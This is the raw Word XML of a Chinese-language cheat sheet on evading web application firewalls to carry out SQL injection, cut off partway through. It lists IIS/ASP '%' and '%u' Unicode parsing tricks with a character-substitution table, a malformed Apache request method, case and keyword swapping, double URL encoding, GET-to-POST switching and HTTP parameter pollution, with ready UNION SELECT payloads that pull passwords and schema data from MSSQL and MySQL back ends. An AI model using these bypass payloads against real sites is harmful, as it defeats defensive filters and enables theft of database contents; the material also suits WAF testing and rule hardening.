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D5" w:rsidRDefault="00B12C36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特性(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asp+iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:r w:rsidRPr="00B12C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该环境下当输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>s%elect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>，在WAF</w:t>
      </w:r>
      <w:r>
        <w:t>层解析出来的结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>s%elect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，但</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>iis+asp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>的环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>，解析结果为select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:r w:rsidRPr="00B12C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>下asp.dll</w:t>
      </w:r>
      <w:r>
        <w:t>解析时</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>的问题，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>aspx+iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>没有这个特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36"/>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.%u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特性(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>asp+iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12C36">
        <w:t>aspx+iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lect -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12C36">
        <w:t>s%u006c%u0006ect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12C36" w:rsidRDefault="00B12C36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00666527">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00666527">
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析后</w:t>
      </w:r>
      <w:r w:rsidR="00666527">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elect </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666527" w:rsidRDefault="00666527"/>
    <w:p w:rsidR="00666527" w:rsidRDefault="00666527">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00666527">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另类</w:t>
      </w:r>
      <w:r>
        <w:t>%u</w:t>
      </w:r>
      <w:r w:rsidRPr="00666527">
        <w:t>特性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asp+iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666527" w:rsidRDefault="00666527" w:rsidP="00666527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666527">
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666527">
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666527">
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r w:rsidRPr="00666527">
        <w:t>后会被转换成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666527">
        <w:t>multibyte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，但转换的过程中可能出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666527">
        <w:t>多个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666527">
        <w:t>widechar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666527">
        <w:t>会有可能转换为同一个字符。如select中的e对应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666527">
        <w:t>unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666527">
        <w:t>为%u0065，但%u00f0同样会被转换成为e。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00666527" w:rsidP="00666527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>s%u0065lect-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>select  s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%u00f0lect-&gt;select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00024183">
        <w:t>union+select+from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>s%u0045lect = s%u0065lect = %u00f0lect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>u --&gt; %u0055 --&gt; %u0075</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>n --&gt;%u004e --&gt; %u006e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --&gt;%u0049 --&gt; %u0069</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>o --&gt;%u004f --&gt; %u006f --&gt;%u00ba</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>s --&gt;%u0053 --&gt; %u0073</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>l --&gt;%u004c --&gt; %u006c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>e --&gt;%u0045 --&gt; %u0065--&gt;%u00f0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>c --&gt;%u0043 --&gt; %u0063</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>t --&gt;%u0054 --&gt;%u0074 --&gt;%u00de --&gt;%u00fe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>f --&gt;%u0046 --&gt;%u0066</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>r --&gt;%u0052 --&gt;%u0072</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183">
      <w:r>
        <w:t>m --&gt;%u004d --&gt;%u006d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024183" w:rsidRDefault="00024183" w:rsidP="00024183"/>
    <w:p w:rsidR="00024183" w:rsidRDefault="0003755F" w:rsidP="00024183">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="0003755F">
        <w:t xml:space="preserve"> apache畸形method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="00024183">
      <w:r w:rsidRPr="0003755F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0003755F">
        <w:t>GET请求中，GET可以替换为任意参数名字，不影响</w:t>
      </w:r>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidRPr="0003755F">
        <w:t>接收参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F">
      <w:r>
        <w:t>TEST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sql.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F">
      <w:r>
        <w:t>Host: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F">
      <w:r>
        <w:t>Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhtml+xml,application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:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F"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=0.8,en-US;q=0.5,en;q=0.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F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03755F" w:rsidRDefault="0003755F" w:rsidP="0003755F">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003755F" w:rsidRDefault="0003755F" w:rsidP="0003755F">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="0003755F"/>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="0003755F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用层特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="0003755F">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D63FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小写</w:t>
      </w:r>
      <w:r w:rsidRPr="007D63FE">
        <w:t>/关键字替换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRPr="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>绕过只针对特定关键字，大小写不敏感。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t xml:space="preserve">id=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UnIoN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/**/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1,user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE"/>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将关键字进行等价替换：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t>Hex() bin() 等价于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t>Sleep() 等价于 benchmark()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t xml:space="preserve">Mid()substring() 等价于 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t>@@user 等价于 User()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t>@@Version 等价于 version()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE"/>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D63FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双重</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D63FE">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D63FE">
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D63FE" w:rsidRDefault="007D63FE" w:rsidP="007D63FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007D63FE">
        <w:t>%73</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007D63FE">
        <w:t>%25%37%33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="007D63FE">
      <w:r w:rsidRPr="00F76CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般情况下在代码层默认做一次</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76CFE">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76CFE">
        <w:t>解码，这样解码之后的数据一般不会匹配到规则，达到了bypass的效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="007D63FE"/>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="007D63FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变换请求方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="007D63FE">
      <w:r w:rsidRPr="00F76CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76CFE">
        <w:t>GET变成POST提交</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="00F76CFE">
      <w:r>
        <w:t>&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="00F76CFE">
      <w:r>
        <w:t>&lt;form action="http://192.168.204.128/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test.php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:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="00F76CFE">
      <w:r>
        <w:t>&lt;input type="text" name="id"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="00F76CFE">
      <w:r>
        <w:t>&lt;input type="submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76CFE" w:rsidRDefault="00F76CFE" w:rsidP="00F76CFE">
      <w:r>
        <w:t>&lt;/form&gt;&lt;/body&gt;` `&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传数据包参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:t>------WebKitFormBoundaryACZoaLJJzUwc4hYM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:t>Content-Disposition: form-data; name="id"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>schema.SCHEMATA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:t>------WebKitFormBoundaryACZoaLJJzUwc4hYM--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D"/>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7721D">
        <w:t>HPP参数污染</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>=1&amp;id=2&amp;id=3的形式，此种形式在获取id</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7721D">
        <w:t>时不同的web技术获取的值是不一样的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r w:rsidRPr="00A7721D">
        <w:t xml:space="preserve">Asp.net + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>：id=1,2,3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:r w:rsidRPr="00A7721D">
        <w:t xml:space="preserve">Asp + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>：id=1,2,3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7721D" w:rsidRDefault="00A7721D" w:rsidP="00A7721D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t>Php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A7721D">
        <w:t xml:space="preserve"> + apache：id=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="00A7721D">
      <w:r w:rsidRPr="003E3886">
        <w:t>MSSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="00A7721D">
      <w:r w:rsidRPr="003E3886">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小写：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E3886">
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E3886">
        <w:t>=1 UNION/*&amp;ID=*/SELECT 1,2/*&amp;Id=*/FROM ADMIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="00A7721D">
      <w:r w:rsidRPr="003E3886">
        <w:t>GET+POST形式:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>http://192.168.125.140/test/sql.aspx?id=1 union/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">post:  id=2*/select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>null,null</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用逗号：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=1 union select 1&amp;id=2&amp;id=3&amp;id=4 from admin--（无逗号形式）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=1+union/*&amp;b=*/select+1,pass/*&amp;c=*/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>from+users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--(分割参数注入)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
